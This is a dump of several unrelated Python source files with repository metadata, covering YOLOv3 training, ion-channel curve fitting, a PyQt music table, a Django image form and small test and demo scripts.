freeze_body=2, weights_path='model_data/tiny_yolo_weights.h5')
else:
model = create_model(input_shape, anchors, num_classes,
freeze_body=2, weights_path='model_data/yolo_weights.h5') # make sure you know what you freeze
logging = TensorBoard(log_dir=log_dir)
checkpoint = ModelCheckpoint(log_dir + 'ep{epoch:03d}-loss{loss:.3f}-val_loss{val_loss:.3f}.h5',
monitor='val_loss', save_weights_only=True, save_best_only=True, period=3)
reduce_lr = ReduceLROnPlateau(monitor='val_loss', factor=0.1, patience=3, verbose=1)
early_stopping = EarlyStopping(monitor='val_loss', min_delta=0, patience=10, verbose=1)
val_split = 0.1
with open(annotation_path) as f:
lines = f.readlines()
np.random.seed(10101)
np.random.shuffle(lines)
np.random.seed(None)
num_val = int(len(lines)*val_split)
num_train = len(lines) - num_val
# Train with frozen layers first, to get a stable loss.
# Adjust num epochs to your dataset. This step is enough to obtain a not bad model.
if True:
model.compile(optimizer=Adam(lr=1e-3), loss={
# use custom yolo_loss Lambda layer.
'yolo_loss': lambda y_true, y_pred: y_pred})
batch_size = 32
print('Train on {} samples, val on {} samples, with batch size {}.'.format(num_train, num_val, batch_size))
model.fit_generator(data_generator_wrapper(lines[:num_train], batch_size, input_shape, anchors, num_classes),
steps_per_epoch=max(1, num_train//batch_size),
validation_data=data_generator_wrapper(lines[num_train:], batch_size, input_shape, anchors, num_classes),
validation_steps=max(1, num_val//batch_size),
epochs=50,
initial_epoch=0,
callbacks=[logging, checkpoint])
model.save_weights(log_dir + 'trained_weights_stage_1.h5')
# Unfreeze and continue training, to fine-tune.
# Train longer if the result is not good.
if True:
for i in range(len(model.layers)):
model.layers[i].trainable = True
model.compile(optimizer=Adam(lr=1e-4), loss={'yolo_loss': lambda y_true, y_pred: y_pred}) # recompile to apply the change
print('Unfreeze all of the layers.')
batch_size = 32 # note that more GPU memory is required after unfreezing the body
print('Train on {} samples, val on {} samples, with batch size {}.'.format(num_train, num_val, batch_size))
model.fit_generator(data_generator_wrapper(lines[:num_train], batch_size, input_shape, anchors, num_classes),
steps_per_epoch=max(1, num_train//batch_size),
validation_data=data_generator_wrapper(lines[num_train:], batch_size, input_shape, anchors, num_classes),
validation_steps=max(1, num_val//batch_size),
epochs=100,
initial_epoch=50,
callbacks=[logging, checkpoint, reduce_lr, early_stopping])
model.save_weights(log_dir + 'trained_weights_final.h5')
# Further training if needed.
def get_classes(classes_path):
'''loads the classes'''
with open(classes_path) as f:
class_names = f.readlines()
class_names = [c.strip() for c in class_names]
return class_names
def get_anchors(anchors_path):
'''loads the anchors from a file'''
with open(anchors_path) as f:
anchors = f.readline()
anchors = [float(x) for x in anchors.split(',')]
return np.array(anchors).reshape(-1, 2)
def create_model(input_shape, anchors, num_classes, load_pretrained=True, freeze_body=2,
weights_path='model_data/yolo_weights.h5'):
'''create the training model'''
K.clear_session() # get a new session
image_input = Input(shape=(None, None, 3))
h, w = input_shape
num_anchors = len(anchors)
y_true = [Input(shape=(h//{0:32, 1:16, 2:8}[l], w//{0:32, 1:16, 2:8}[l], \
num_anchors//3, num_classes+5)) for l in range(3)]
model_body = yolo_body(image_input, num_anchors//3, num_classes)
print('Create YOLOv3 model with {} anchors and {} classes.'.format(num_anchors, num_classes))
if load_pretrained:
model_body.load_weights(weights_path, by_name=True, skip_mismatch=True)
print('Load weights {}.'.format(weights_path))
if freeze_body in [1, 2]:
# Freeze darknet53 body or freeze all but 3 output layers.
num = (185, len(model_body.layers)-3)[freeze_body-1]
for i in range(num): model_body.layers[i].trainable = False
print('Freeze the first {} layers of total {} layers.'.format(num, len(model_body.layers)))
model_loss = Lambda(yolo_loss, output_shape=(1,), name='yolo_loss',
arguments={'anchors': anchors, 'num_classes': num_classes, 'ignore_thresh': 0.5})(
[*model_body.output, *y_true])
model = Model([model_body.input, *y_true], model_loss)
return model
def create_tiny_model(input_shape, anchors, num_classes, load_pretrained=True, freeze_body=2,
weights_path='model_data/tiny_yolo_weights.h5'):
'''create the training model, for Tiny YOLOv3'''
K.clear_session() # get a new session
image_input = Input(shape=(None, None, 3))
h, w = input_shape
num_anchors = len(anchors)
y_true = [Input(shape=(h//{0:32, 1:16}[l], w//{0:32, 1:16}[l], \
num_anchors//2, num_classes+5)) for l in range(2)]
model_body = tiny_yolo_body(image_input, num_anchors//2, num_classes)
print('Create Tiny YOLOv3 model with {} anchors and {} classes.'.format(num_anchors, num_classes))
if load_pretrained:
model_body.load_weights(weights_path, by_name=True, skip_mismatch=True)
print('Load weights {}.'.format(weights_path))
if freeze_body in [1, 2]:
# Freeze the darknet body or freeze all but 2 output layers.
num = (20, len(model_body.layers)-2)[freeze_body-1]
for i in range(num): model_body.layers[i].trainable = False
print('Freeze the first {} layers of total {} layers.'.format(num, len(model_body.layers)))
model_loss = Lambda(yolo_loss, output_shape=(1,), name='yolo_loss',
arguments={'anchors': anchors, 'num_classes': num_classes, 'ignore_thresh': 0.7})(
[*model_body.output, *y_true])
model = Model([model_body.input, *y_true], model_loss)
return model
def data_generator(annotation_lines, batch_size, input_shape, anchors, num_classes):
'''data generator for fit_generator'''
n = len(annotation_lines)
i = 0
while True:
image_data = []
box_data = []
for b in range(batch_size):
if i==0:
np.random.shuffle(annotation_lines)
image, box = get_random_data(annotation_lines[i], input_shape, random=True)
image_data.append(image)
box_data.append(box)
i = (i+1) % n
image_data = np.array(image_data)
box_data = np.array(box_data)
y_true = preprocess_true_boxes(box_data, input_shape, anchors, num_classes)
yield [image_data, *y_true], np.zeros(batch_size)
def data_generator_wrapper(annotation_lines, batch_size, input_shape, anchors, num_classes):
n = len(annotation_lines)
if n==0 or batch_size<=0: return None
return data_generator(annotation_lines, batch_size, input_shape, anchors, num_classes)
if __name__ == '__main__':
_main()
| [
"you@example.com"
] | you@example.com |
d46a46d06171563485050b9203c957d38c0d0829 | 9f2445e9a00cc34eebcf3d3f60124d0388dcb613 | /2019-11-13-kineticfeatures/hhfitting_minimize_all.py | 65943f142fdd8a7ddda864998cb0f6a72011bff9 | [] | no_license | analkumar2/Thesis-work | 7ee916d71f04a60afbd117325df588908518b7d2 | 75905427c2a78a101b4eed2c27a955867c04465c | refs/heads/master | 2022-01-02T02:33:35.864896 | 2021-12-18T03:34:04 | 2021-12-18T03:34:04 | 201,130,673 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 2,359 | py | #exec(open('hhfitting_minimize.py').read())
#Using fmin
import h5py
import numpy as np
import matplotlib.pyplot as plt
import os
from scipy import signal
from scipy.optimize import minimize
from scipy.optimize import curve_fit
from scipy.optimize import Bounds
# We do it for cell rCell10070.nwb
# Take from 993 to 5987 idx which is 100.3ms to 599.7ms
# First we extract the trace, then fit individual trace and then in a loop collect for all inf and tau values.
# In another file we check if the model also fits to the deactivation traces.
levelnum = 13
reader = h5py.File('../../Raw_data/Channelpedia/Kv1.1/DataKv1.1RatCHO/rCell10070.nwb')
data = reader['acquisition']['timeseries']['Activation']['repetitions']['repetition2']['data']
leak = np.mean(data[993:5987,4]*1e-9)
G = (np.transpose(data[993:5987,:])*1e-9 - np.transpose(leak))/(np.arange(-0.090,0.090,0.010)+0.0962)[:,None]
Gnorm = G/np.max(G)
t = np.arange(0,len(Gnorm[levelnum])/10000,1/10000)
# plt.figure(1)
# plt.plot(np.transpose(G))
# plt.figure(2)
# plt.plot(data[993:5987,4:15])
# plt.show()
def kineticfunc_array(minfV, mtauV, hinfV, htauV, min, hin, mpow, hpow):
#Assuming that at time=0, the channel is at steady state at -80mV.
m = minfV + (min-minfV)*np.exp(-t/mtauV)
h = hinfV + (hin-hinfV)*np.exp(-t/htauV)
return m**mpow*h**hpow
def error(x):
minfV, mtauV, hinfV, htauV = x
min, hin, mpow, hpow = 0,1,1,1
return np.sum((kineticfunc_array(minfV, mtauV, hinfV, htauV, min, hin, mpow, hpow) - Gnorm[levelnum])**2)
bounds = Bounds([0,0.00001,0,0.0001],[1,1,1,1])
#bb = [(0,100e-8),(0.1),(1e-5,1),(0,1),(1e-4,1)]
# minimum = minimize(error, [3,1,0.005,0.05,0.050,0,1,1,1], method='L-BFGS-B', bounds=bounds)
# minimum = minimize(error, [3,1,0.005,0.05,0.050,0,1,1,1], method='TNC', bounds=bounds)
# minimum = minimize(error, [1,0.005,0.05,0.050,0,1], method='Nelder-Mead', bounds=bounds)
# minimum = minimize(error, [5e-8,1,0.0005,0.25,0.1], method='trust-constr', bounds=bounds)
for level in np.arange(-0.040,0.060,0.010):
levelnum = int((level+0.060)/0.010)
minimum = minimize(error, [1,0.005,0.05,0.050], method='Nelder-Mead', bounds=bounds)
print(minimum.x)
plt.plot(t,Gnorm[levelnum])
plt.plot(t,kineticfunc_array(*minimum.x, *[0,1,1,1]))
# plt.plot(t,kineticfunc_array(*[10e-8,1,0.0005,0.25,0.1], *[0,1,1,1]))
plt.show()
| [
"analkumar2@gmail.com"
] | analkumar2@gmail.com |
2b51bb93386e0ac1b6f86ceadeaa9b0d86f1bacf | e7b6364245adec14cc47cbe5f2206afcba81d734 | /main/models.py | 8cc8cc3d931e5710e1e23fd46cacecd70d4e3f28 | [] | no_license | anaf007/myapp | 255cd3476fe05f9e063c96c3dc535e7089cf317f | 90e2da4a4e0ec1d10620609cfa59f58a78fed08b | refs/heads/master | 2020-03-24T05:14:03.174477 | 2018-08-02T09:33:30 | 2018-08-02T09:33:30 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 194 | py | from main.extensions import login_manager
from main.user.models import User
@login_manager.user_loader
def load_user(user_id):
"""Load user by ID."""
return User.get_by_id(int(user_id)) | [
"anaf@163.com"
] | anaf@163.com |
81c8562b87597fa5954ae5a0d9f29bf0e1dc7a0c | b7cb4d7a14b4d15741ca18c7d6159f2e755e49ff | /pysurrogate/util/usage.py | 59a844e65cf5b88dad879e7ee0d08d1e95a0d576 | [
"MIT"
] | permissive | mberkanbicer/pysurrogate | eb270099d452602d41368ae08f0e70d03b945018 | 6fe58f157920ef7819bcd4756342b2ca778f43b8 | refs/heads/master | 2023-03-16T00:46:11.221702 | 2018-09-12T18:26:53 | 2018-09-12T18:26:53 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,723 | py | import numpy as np
import matplotlib.pyplot as plt
from pysurrogate.optimize import fit, predict
if __name__ == '__main__':
# number of samples we will use for this example
n_samples = 20
# ---------------------------------------------------------
# Example 1: One input variable and one target
# ---------------------------------------------------------
X = np.random.rand(n_samples, 1) * 4 * np.pi
Y = np.cos(X)
# fit the model and predict the data
model = fit(X, Y, n_folds=3, disp=True, normalize_X=True, normalize_Y=True)
_X = np.linspace(0, 4 * np.pi, 1000)
_Y = predict(model, _X)
plt.scatter(X, Y, label="Observations")
plt.plot(_X, _Y, label="True")
plt.show()
# ---------------------------------------------------------
# Example 2: Two input variables and two targets.
# Normalize before building the model and use only an RBF implementation with a specific kernel
# Finally validate the model error on the true function.
# ---------------------------------------------------------
X = (np.random.rand(n_samples, 2) * 200) + 500
func_eval = lambda X: np.concatenate([np.sum(np.square(X), axis=1)[:, None], np.sum(np.sqrt(X), axis=1)[:, None]], axis=1)
Y = func_eval(X)
# fit the model and predict the data
model = fit(X, Y, n_folds=3, disp=True, normalize_X=True, normalize_Y=True)
# create two dimensional data to test the
M = np.meshgrid(np.linspace(100, 200, 1000), np.linspace(100, 200, 1000))
_X = np.concatenate([X[:, :, None] for e in X], axis=2).reshape(n_samples * n_samples, 2)
_Y = predict(model, _X)
print(np.mean(np.abs(_Y - func_eval(_X)), axis=0))
| [
"jules89@arcor.de"
] | jules89@arcor.de |
6ce2efa1815bfbcb8520ef0ef62c4d9a19a81325 | 46e9fc0fc20a58026d35a163c7201f1b40844ce8 | /src/widgets/music_table_widget.py | cc86686d7da19ee6e19240dc84ed25d9aaa756ad | [
"MIT"
] | permissive | kiragoo/FeelUOwn | c47d09bd8f1ee6200ebd5c8a0de30e5b6f403d22 | 07b88b452af873f1596a1cbf551a21ffc940cb94 | refs/heads/master | 2021-05-29T23:25:51.556985 | 2015-08-05T09:14:33 | 2015-08-05T09:14:33 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,877 | py | # -*- coding:utf8 -*-
from PyQt5.QtGui import *
from PyQt5.QtCore import *
from PyQt5.QtWidgets import *
from base.logger import LOG
class MusicTableWidget(QTableWidget):
"""显示音乐信息的tablewidget
"""
signal_play_music = pyqtSignal([int], name='play_music')
signal_remove_music_from_list = pyqtSignal([int], name='remove_music_from_list')
def __init__(self, rows=0, columns=5, parent=None):
super().__init__(rows, columns, parent)
self.__row_mid_map = [] # row 为 index, mid为值
self.__special_focus_out = False
self.__signal_mapper = QSignalMapper() # 把remove_music按钮和mid关联起来
self.__set_prop()
self.__init_signal_binding()
def __set_objects_name(self):
pass
def __init_signal_binding(self):
self.cellDoubleClicked.connect(self.on_cell_double_clicked)
self.cellClicked.connect(self.on_remove_music_btn_clicked)
def __set_prop(self):
self.horizontalHeader().setSectionResizeMode(0, QHeaderView.Stretch)
self.horizontalHeader().setDefaultAlignment(Qt.AlignLeft)
self.setEditTriggers(QAbstractItemView.NoEditTriggers)
self.setSelectionBehavior(QAbstractItemView.SelectRows)
self.setHorizontalHeaderLabels([u'歌曲名',
u'歌手',
u'专辑名',
u'时长'])
self.setShowGrid(False) # item 之间的 border
self.setMouseTracking(True)
self.setFocusPolicy(Qt.StrongFocus)
self.setWindowFlags(Qt.FramelessWindowHint)
self.setAlternatingRowColors(True)
def focusOutEvent(self, event):
self.close()
def add_item_from_model(self, music_model):
if self.is_item_already_in(music_model['id']) is not False: # is
return False
artist_name = ''
music_item = QTableWidgetItem(music_model['name'])
album_item = QTableWidgetItem(music_model['album']['name'])
if len(music_model['artists']) > 0:
artist_name = music_model['artists'][0]['name']
artist_item = QTableWidgetItem(artist_name)
duration = music_model['duration']
m = int(duration / 60000)
s = int((duration % 60000) / 1000)
duration = str(m) + ':' + str(s)
duration_item = QTableWidgetItem(duration)
music_item.setData(Qt.UserRole, music_model)
row = self.rowCount()
self.setRowCount(row + 1)
self.setItem(row, 0, music_item)
self.setItem(row, 1, artist_item)
self.setItem(row, 2, album_item)
self.setItem(row, 3, duration_item)
btn = QLabel()
btn.setToolTip(u'从当前播放列表中移除')
btn.setObjectName('remove_music') # 为了应用QSS,不知道这种实现好不好
self.setCellWidget(row, 4, btn)
# btn.clicked.connect(self.__signal_mapper.map)
# self.__signal_mapper.setMapping(btn, music_model['id'])
# self.__signal_mapper.mapped.connect(self.on_remove_music_btn_clicked)
self.setRowHeight(row, 30)
self.setColumnWidth(4, 30)
row_mid = dict()
row_mid['mid'] = music_model['id']
row_mid['row'] = row
return True
def set_songs(self, tracks):
self.setRowCount(0)
for track in tracks:
self.add_item_from_model(track)
def is_item_already_in(self, mid):
row = self.find_row_by_mid(mid)
if row is not None:
return row
return False
def focus_cell_by_mid(self, mid):
row = self.find_row_by_mid(mid)
self.setCurrentCell(row, 0)
self.setCurrentItem(self.item(row, 0))
self.scrollToItem(self.item(row, 0))
def find_row_by_mid(self, mid):
row = False
total = self.rowCount()
i = 0
while i < total:
item = self.item(i, 0)
data = item.data(Qt.UserRole)
tmp_mid = data['id']
if tmp_mid == mid:
row = i
break
i += 1
return row
def find_mid_by_row(self, row):
item = self.item(row, 0)
data = item.data(Qt.UserRole)
mid = data['mid']
return mid
@pyqtSlot(int, int)
def on_cell_double_clicked(self, row, column):
item = self.item(row, 0)
music_model = item.data(Qt.UserRole)
self.signal_play_music.emit(music_model['id'])
@pyqtSlot(int, int)
def on_remove_music_btn_clicked(self, row, column):
if column != 4:
return
item = self.item(row, 0)
data = item.data(Qt.UserRole)
mid = data['id']
row = self.find_row_by_mid(mid)
self.removeRow(row)
self.signal_remove_music_from_list.emit(mid) | [
"yinshaowen241@gmail.com"
] | yinshaowen241@gmail.com |
8784fdd39fd7940c5323ecb33a5d20bc0be6b2c1 | 4160b450b052830e17457a0412e29414f67caea5 | /goods/apps.py | 42618868a73474215ce8f280268254282c223de0 | [] | no_license | mnogoruk/fastcustoms | 6ad7b058607ddf4d2b56a09e23e66fcfb43be1a7 | 4c3bf7f9f1d4af2851f957a084b6adc2b7b7f681 | refs/heads/master | 2023-08-23T15:54:08.415613 | 2021-10-31T12:21:29 | 2021-10-31T12:21:29 | 372,066,847 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 142 | py | from django.apps import AppConfig
class CargoConfig(AppConfig):
default_auto_field = 'django.db.models.BigAutoField'
name = 'goods'
| [
"lionless072@gmail.com"
] | lionless072@gmail.com |
2e18bb631907b32d1f4cdde82bdb2a57e871174f | 746a9c1f65674cd5bcdce6dbd1971b6a16345f9d | /images/forms.py | dd89b8853a27fc1fdb599041349f517c15c147a7 | [] | no_license | mazulo/bookmarks | 4dc25dc09772663c65698d3cc9f5b653fd409ba9 | 5c2ce3c3ad811466c63f7b0f3a21bf33a6a28f5e | refs/heads/master | 2021-01-10T07:23:37.185414 | 2016-03-23T06:40:53 | 2016-03-23T05:40:53 | 54,158,063 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,305 | py | from urllib import request
from django import forms
from django.core.files.base import ContentFile
from django.utils.text import slugify
from .models import Image
class ImageCreateForm(forms.ModelForm):
class Meta:
model = Image
fields = ('title', 'url', 'description')
widgets = {
'url': forms.HiddenInput,
}
def clean_url(self):
url = self.cleaned_data['url']
valid_extensions = ['jpg', 'jpeg']
extension = url.rsplit('.', 1)[1].lower()
if extension not in valid_extensions:
raise forms.ValidationError(
'The given URL does not match valid image extensions.'
)
return url
def save(self, force_insert=False, force_update=False, commit=True):
image = super(ImageCreateForm, self).save(commit=False)
image_url = self.cleaned_data['url']
image_name = '{}.{}'.format(
slugify(image.title),
image_url.rsplit('.', 1)[1].lower()
)
# download image from the given URL
response = request.urlopen(image_url)
image.image.save(
image_name,
ContentFile(response.read()),
save=False
)
if commit:
image.save()
return image
| [
"pmazulo@gmail.com"
] | pmazulo@gmail.com |
846a5e2ab2a378670c30bbbbae0fcf1e5f6f4070 | 23fddc940a266c2d1d0e0b1687c36cdbcc9d54d9 | /test/unittest/line_up/line_up_test.py | adc7a590bbb62f34cfffe5488ea14b34016d80ec | [] | no_license | Cuick/traversing | 210fcfb1c780037de59343fffeb4fa4d3f2eae32 | c78982580af7f63c8bff4dcb37005b7f7c682b5b | refs/heads/master | 2021-01-10T17:38:37.899460 | 2016-11-18T06:06:55 | 2016-11-18T06:06:55 | 55,397,540 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 770 | py | # -*- coding:utf-8 -*-
"""
created by server on 14-7-14下午6:12.
"""
from test.unittest.base.base_test_case import BaseTestCase
import unittest
class LineUpTest(BaseTestCase):
"""test heros_component and hero"""
def test_add_hero(self):
line_up_component = self.player.line_up_component
line_up_component.change_hero(2, 10001, 1)
def test_hero_link(self):
line_up_slot = self.player.line_up_component.line_up_slots.get(2)
hero_slot = line_up_slot.hero_slot
self.NotEqual(hero_slot.link_skill_ids, [])
def test_set_equip(self):
line_up_slot = self.player.line_up_component.line_up_slots.get(2)
self.NotEqual(line_up_slot.set_equ_skill_ids, [])
if __name__ == '__main__':
unittest.main()
| [
"zxzxck@163.com"
] | zxzxck@163.com |
8b92a7c9c58837640882ba3dee0dcaebc67d62bf | 2383bf5a3b58e468d65713c361718795d51f1b97 | /python/call_test.py | 99c1f81aec4011b55d157f082bfafc64cf379f12 | [
"MIT"
] | permissive | rec/test | 3f4fb6614729ebc72d130888a8a9bc550f92988c | a260b9bf7fea96867e64163d3c891c2e2091f636 | refs/heads/master | 2023-08-03T13:49:24.347294 | 2023-07-28T09:19:39 | 2023-07-28T09:19:39 | 65,399,133 | 2 | 1 | null | null | null | null | UTF-8 | Python | false | false | 337 | py | class Call1(object):
def __call__(self, x):
return x
class Call2(object):
def __init__(self):
self.call = lambda x: x
def __call__(self, x):
return self.call(x)
class Call3(object):
def __init__(self):
self.__call__ = lambda x: x
print(Call1()(3))
print(Call2()(3))
print(Call3()(3))
| [
"tom@swirly.com"
] | tom@swirly.com |
55048821cc9cb29b98bdf0c56f5b9d6d22ccaed8 | 0a9949a7dbe5f7d70028b22779b3821c62eb6510 | /static/statistic_struct/user portrait_0430/dynamic_analysis/code_test.py | f774cc12c9f529669c7813a4082b3099290f2e91 | [] | no_license | 744996162/warehouse | ed34f251addb9438a783945b6eed5eabe18ef5a2 | 3efd299a59a0703a1a092c58a6f7dc2564b92e4d | refs/heads/master | 2020-06-04T22:10:14.727156 | 2015-07-03T09:40:09 | 2015-07-03T09:40:09 | 35,603,929 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 162 | py | #ecoding=utf-8
__author__ = 'Administrator'
import sys
reload(sys)
sys.setdefaultencoding('utf-8')
str = '\xe5\x88\xb0\xe8\xbe\xbe'
print(str.encode("utf-8")) | [
"744996162@qq.com"
] | 744996162@qq.com |
d1c9d99e2b1639d463275d911bda31fdb8d8aea9 | ce8ffe238c510f8a80b42aa897ab0ce29698445d | /finfet_ex/finfet/moscap3d.py | 5ccc6333cfd4fa29bd590093e3f9a7177e40537e | [] | no_license | devsim/devsim_misc | 4d29d58314f29cb08939c3580fee24f441f55b50 | 9a3c7056e0e3e7fc49e17031a706573350292d4d | refs/heads/main | 2022-07-20T21:08:08.780498 | 2022-06-27T02:22:11 | 2022-06-27T02:22:11 | 191,487,676 | 1 | 1 | null | null | null | null | UTF-8 | Python | false | false | 2,331 | py |
import pygmsh
import bool_common
geom = pygmsh.opencascade.Geometry(
#characteristic_length_min=.1,
#characteristic_length_max=2.5e-5
)
w=1
h=1
tox=3
tsi=60
xrf=-0.1
trf=3
l_contact=1
#tcl0=0.5 #cl in ox
#tcl1=0.05 #cl near interface
#tcl2=0.5
#tcl3=0.5 #cl near backside
lcar=0.3
lrf=0.1
gate=bool_common.create_box_volume(geom, h=h, w=w, l=l_contact, x=-tox-l_contact, z=0, lcar=lcar)
ox=bool_common.create_box_volume(geom, h=h, w=w, l=tox, x=-tox, z=0, lcar=lcar)
#rf=bool_common.create_box_volume(geom, h=h, w=w, l=trf, x=0, z=0, lcar=lcar)
si=bool_common.create_box_volume(geom, h=h, w=w, l=tsi, x=0, z=0, lcar=lcar)
sub=bool_common.create_box_volume(geom, h=h, w=w, l=l_contact, x=tsi, z=0, lcar=lcar)
all_volumes=[ox, si, gate, sub]
geom.boolean_fragments( all_volumes,[], delete_first=True, delete_other=False)
#['gate', 'sub', 'interface']
#['oxide', 'silicon']
geom.add_physical_volume(gate, 'gate')
geom.add_physical_volume(sub, 'sub')
geom.add_physical_volume(ox, 'ox')
geom.add_physical_volume(si, 'si')
# TODO: add refinement box
#
mydict = {
"lrf" : lrf,
"lcar" : lcar,
"trf" : trf,
"xrf" : xrf,
"w" : w,
"h" : h,
}
with open('moscap3d.geo', 'w') as ofh:
ofh.write('''\
// This option may be important for background mesh
//Mesh.CharacteristicLengthExtendFromBoundary=0; /* do not extend from boundary points */
//Mesh.Algorithm3D=1 /* 1 is Delaunay, Tetgen */
//Mesh.CharacteristicLengthMax = 1; /*maximum characteristic length */
//Mesh.CharacteristicLengthMin = 0; /*maximum characteristic length */
//Mesh.CharacteristicLengthFromCurvature = 1
//Mesh.CharacteristicLengthFromPoints = 1
//Mesh.CharacteristicLengthExtendFromBoundary=0;
//Geometry.ScalingFactor=1.0e-7;
//Mesh.CharacteristicLengthMax = 2.5e-5; /*maximum characteristic length */
''')
ofh.write(geom.get_code())
ofh.write("\n")
ofh.write('''
Field[1] = Box;
Field[1].VIn = %(lrf)s;
Field[1].VOut = %(lcar)s;
Field[1].XMin = %(xrf)s;
Field[1].XMax = %(trf)s+%(xrf)s;
Field[1].YMin = -0.5*%(h)s;
Field[1].YMax = +0.5*%(h)s;
Field[1].ZMin = 0;
Field[1].ZMax = %(w)s;
Background Field = 1;
Mesh.CharacteristicLengthExtendFromBoundary = 1;
Mesh.CharacteristicLengthFromPoints = 1;
Mesh.CharacteristicLengthMax = %(lcar)s; /*maximum characteristic length */
''' % mydict)
# ofh.write("Coherence;\n")
| [
"juan@tcad.com"
] | juan@tcad.com |
600cb4a4a0fb0c02fd641c0744d20d4413860cd0 | 8d2abf7ad4c3f35801f6bfdb38a4d6cddf1e0fbd | /0404/demo03.py | b105dd59dfb4f75a1769f41c31d1d8eb5067af08 | [] | no_license | erroren/Python_A | e9dfba73fc09160e4d3b8ea994183e2735f9d36e | 47901316902705e513ea7d6e016f98f1cd2d3e85 | refs/heads/master | 2020-05-04T14:27:29.118843 | 2019-06-13T08:50:03 | 2019-06-13T08:50:03 | 179,197,541 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 313 | py | L = [x for x in range(10)]
print(L, type(L), L.__sizeof__())
L1 = (x for x in range(10))
print(L1, type(L1), L1.__sizeof__())
# print(L1.__next__())
def run(L1):
for i in L1:
yield i
r = run(L1)
while True:
try:
print(next(r))
except Exception as e:
print(e)
break
| [
"hcy@qq.com"
] | hcy@qq.com |
7580457f1767cfc3fd8424fd738c1d6e49fa6094 | c0f5d309576f791f8cc062e2d0cad340eec41d7d | /190326_electric_bus_2.py | 0045a43b557135b855703e93b6422e9e110f0f7f | [] | no_license | mjjin1214/algorithm | fa91455ab792c38d01fd210c12e53e50f516eb55 | 423119406061443939b4b966c7d9f1513544dd03 | refs/heads/master | 2020-04-22T19:31:23.981387 | 2019-04-05T07:58:10 | 2019-04-05T07:58:10 | 170,610,108 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 466 | py | import sys
sys.stdin = open('input1.txt')
def backtrack(x, count):
global min_count
if count >= min_count:
return
if x >= data[0]:
if min_count > count:
min_count = count
return
for i in range(data[x], 0, -1):
backtrack(x+i, count+1)
T = int(input())
for t in range(T):
data = list(map(int, input().split()))
min_count = data[0]
backtrack(1, 0)
print('#{} {}'.format(t+1, min_count-1)) | [
"moc0etan@gmail.com"
] | moc0etan@gmail.com |
f7a398e1bd474d711dd6004b39549a4426d9920a | 388556baa0c2ee53d8767ae8a4bce18c03124488 | /Chapter10/0011_rev09_match_z.py | b30aaea61405322ecf5e6f08f6aa090553e2a735 | [] | no_license | 8563a236e65cede7b14220e65c70ad5718144a3/introduction-python-programming-solutions | 6e2e7c8cf8babc3c63f75d8d5e987f4dbc018269 | f21d70ae2062cc2d5d3a2fefce81a2a3b4ea3bfd | refs/heads/master | 2022-12-10T04:24:56.364629 | 2020-07-01T11:34:01 | 2020-07-01T11:34:01 | 294,878,260 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 379 | py | """
Review Question 9
Matches a word containing "z"
"""
import re
def main():
user_string = input("Enter sequence ")
pattern = re.compile(r"\b\w*z\w*\b")
match_object = pattern.search(user_string)
if match_object:
print("Match found")
print(match_object.group())
else:
print("No match found")
if __name__ == "__main__":
main()
| [
"warren.jitsing@gmail.com"
] | warren.jitsing@gmail.com |
37ad454a8a7d3c8cc63dd66a836de528d210b27f | ca7aa979e7059467e158830b76673f5b77a0f5a3 | /Python_codes/p03240/s819025179.py | 868e91e9b7562f6eedc217a4bfc2a8b1b491522a | [] | no_license | Aasthaengg/IBMdataset | 7abb6cbcc4fb03ef5ca68ac64ba460c4a64f8901 | f33f1c5c3b16d0ea8d1f5a7d479ad288bb3f48d8 | refs/heads/main | 2023-04-22T10:22:44.763102 | 2021-05-13T17:27:22 | 2021-05-13T17:27:22 | 367,112,348 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,979 | py | import sys
import os
import math
import bisect
import itertools
import collections
import heapq
import queue
import array
# 時々使う
# from scipy.sparse.csgraph import csgraph_from_dense, floyd_warshall
# from decimal import Decimal
# from collections import defaultdict, deque
# 再帰の制限設定
sys.setrecursionlimit(10000000)
def ii(): return int(sys.stdin.buffer.readline().rstrip())
def il(): return list(map(int, sys.stdin.buffer.readline().split()))
def fl(): return list(map(float, sys.stdin.buffer.readline().split()))
def iln(n): return [int(sys.stdin.buffer.readline().rstrip())
for _ in range(n)]
def iss(): return sys.stdin.buffer.readline().decode().rstrip()
def sl(): return list(map(str, sys.stdin.buffer.readline().decode().split()))
def isn(n): return [sys.stdin.buffer.readline().decode().rstrip()
for _ in range(n)]
def lcm(x, y): return (x * y) // math.gcd(x, y)
# MOD = 10 ** 9 + 7
MOD = 998244353
INF = float('inf')
def main():
if os.getenv("LOCAL"):
sys.stdin = open("input.txt", "r")
N = ii()
xyh = [il() for _ in range(N)]
for cx in range(0, 101):
for cy in range(0, 101):
tmp_x, tmp_y, tmp_h = -1, -1, -1
for x, y, h in xyh:
# 高さが1以上の調査点から
# ピラミッドの中心を求める
if h == 0:
continue
tmp_x, tmp_y = cx, cy
tmp_h = h + abs(x - cx) + abs(y - cy)
break
if tmp_h != -1:
# 求めた中心が全ての調査点の条件と
# 一致するか否かを確かめる
for x, y, h in xyh:
if h != max(tmp_h - abs(x - tmp_x) - abs(y - tmp_y), 0):
break
else:
print(tmp_x, tmp_y, tmp_h)
exit()
if __name__ == '__main__':
main()
| [
"66529651+Aastha2104@users.noreply.github.com"
] | 66529651+Aastha2104@users.noreply.github.com |
83bd218a3a6158cde57369b86689442952cd1249 | f8ad6963bfc851657ea50c6a036cfad29cdd7f60 | /Books/LearningTensorFlow/Chapter3_Tensorflow_Basic_Understand/subchapter_03_04_Linear_Regression.py | 9c139d920a30a7310ed8b501626cfe7d1ea747e6 | [] | no_license | foru120/PythonRepository | e1ab0265c0f50ef2e9acdf7447237c913560692b | db6b6be0f9fb91b0a81a3b6a2ec5631daab10f98 | refs/heads/master | 2021-01-01T06:53:11.728109 | 2019-04-25T13:52:50 | 2019-04-25T13:52:50 | 97,541,222 | 4 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,265 | py | import numpy as np
import tensorflow as tf
# Synthetic regression data: 2000 samples with 3 features each, generated
